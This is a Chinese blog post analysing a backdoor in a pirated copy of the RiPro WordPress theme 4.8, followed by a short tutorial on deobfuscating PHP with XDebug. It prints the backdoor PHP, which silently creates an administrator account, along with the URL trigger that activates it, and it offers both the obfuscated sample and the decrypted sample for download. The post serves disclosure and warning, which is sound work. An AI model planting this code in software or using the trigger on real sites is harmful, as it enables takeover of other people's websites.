最新公告
  • 欢迎您光临旗鱼小站,本站秉承服务宗旨 履行“站长”责任,销售只是起点 服务永无止境!立即加入我们
  • 关于本站ripro主题4.8版本后门分析

    下载后用D盾扫描
    1576567574-a25ab78deb7ecfe
    发现有加密文件,用Notepad++查看
    1576567576-c3241cdc94dce50
    破解混淆加密后得到源文件
    1576567577-c849ed028514d54
    经查看发现后门代码
    1576567577-3ca0a218d1c6aa6

    [PHP] 纯文本查看 复制代码
    01
    02
    03
    04
    05
    06
    07
    08
    09
    10
    11
    12
    add_action('wp_head', 'wp_backdoor');
    function wp_backdoor()
    {
            if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {
                    require('wp-includes/registration.php');
                    if (!username_exists('backdoor')) { //检测是否存在backdoor账户
                            $user_id = wp_create_user('backdoor', '123456'); //创建账户
                            $user = new WP_User($user_id);
                            $user->set_role('administrator'); //设置为管理员权限
                    }
            }
    }

    使用http(s)://你的域名/?backdoor=go访问,
    自动创建用户名为backdoor密码为123456的管理员账户
    本地测试
    1576567579-3700406950b9c71

    1576567580-f4ebd98c151e664

    1576567581-035dc56e97c7a11
    成功登录后台
    1576567582-fc7127e6fc60957

    1576567583-6c64455feacc5b9
    推荐这种涉及到支付的主题还是用正版,盗版的就如作者所说,很容易被添加后门。
    毕竟没有真正免费的午餐。


    解密后的文件
    1576567584-adcdbd79a8d8417 core.class.zip (4.02 KB, 下载次数: 48) 
    后门代码已注释,位于412-423行

    看到有人想要学习解密php混淆加密
    使用工具:PHP7.2+XDebug+VSCode{必备插件[PHP Debug(XDebug调试)+PHP IntelliSense(代码格式化)+Code Runner(快速运行php文件,方便调试)}
    当然还有其他配置比如:XDebug安装,Code Runner php文件路径配置等,还是等下一次再出个php调试环境详细配置教程吧。
    原文件用VSCode打开是这样的

    先格式化(右键-格式化文档,多格式化几次)

    保存,改编码为Western (Windows 1252)【本次解密非必须】

    使用 Ctrl + Shift + P 打开快捷指令,输入 encoding,选择用 Change File Encoding,选择 Reopen with Encoding,选择 Western (Windows 1252)。

    Windows 1252 是个单字节的字节集,不会出现任何 2 个字节被显示成 1 个字符的问题,其他的单字节集通常也可以。 ——@Ganlv

    创建PHP调试launch.json文件
    1576567638-d6447a790d87937
    默认配置就可以了,开始调试
    1576567723-214cdcd4bab97ef
    运行PHP文件
    1576567761-c8ff2dc065c779c
    单步调试(F11)
    1576567766-eb0fbe57421de1a
    一直调试可以看见不停的给变量赋值解密函数
    1576567768-c1a6cd8ead3c01e
    多运行几步就会发现源码直接出来了
    1576567771-c2843e639887a2a
    比起Ganlv大神解密的zym/phpjm混淆解密还简单,毕竟没有反调试。
    很适合新手入门破解,欢迎交流学习。
    参考文章:PHP解密:zym加密 带乱码调试过程 https://www.52pojie.cn/thread-693641-1-1.html


    原文件样本,方便大家学习。
    1576567774-adcdbd79a8d8417 core.class.zip (35.2 KB, 下载次数: 18)


    旗鱼小站.我们不生产资源,我们只是大资源的搬运工
    旗鱼小站 » 关于本站ripro主题4.8版本后门分析

    常见问题FAQ

    免费下载或者VIP会员专享资源能否直接商用?
    本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
    提示下载完但解压或打开不了?
    最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。若排除这种情况,可在对应资源底部留言,或 联络我们。
    找不到素材资源介绍文章里的示例图片?
    对于PPT,KEY,Mockups,APP,网页模版等类型的素材,文章内用于介绍的图片通常并不包含在对应可供下载素材包内。这些相关商业图片需另外购买,且本站不负责(也没有办法)找到出处。 同样地一些字体文件也是这种情况,但部分素材会在素材包内有一份字体下载链接清单。

    发表评论

    售后服务:

    • 售后服务范围 1、商业模板使用范围内问题免费咨询
      2、源码安装、模板安装(一般 ¥50-300)服务答疑仅限SVIP用户
      3、单价超过200元的模板免费一次安装,需提供服务器信息。
      付费增值服务 1、提供dedecms模板、WordPress主题、discuz模板优化等服务请详询在线客服
      2、承接 WordPress、DedeCMS、Discuz 等系统建站、仿站、开发、定制等服务
      3、服务器环境配置(一般 ¥50-300)
      4、网站中毒处理(需额外付费,500元/次/质保三个月)
      售后服务时间 周一至周日(法定节假日除外) 9:00-23:00
      免责声明 本站所提供的模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: 1262500034@qq.com),我们会及时删除,给您带来的不便,我们深表歉意!

    Hi, 如果你对这款模板有疑问,可以跟我联系哦!

    联系作者
    • 1053会员总数(位)
    • 2027资源总数(个)
    • 21本周发布(个)
    • 0 今日发布(个)
    • 211稳定运行(天)

    提供最优质的资源集合

    免费资源 精品源码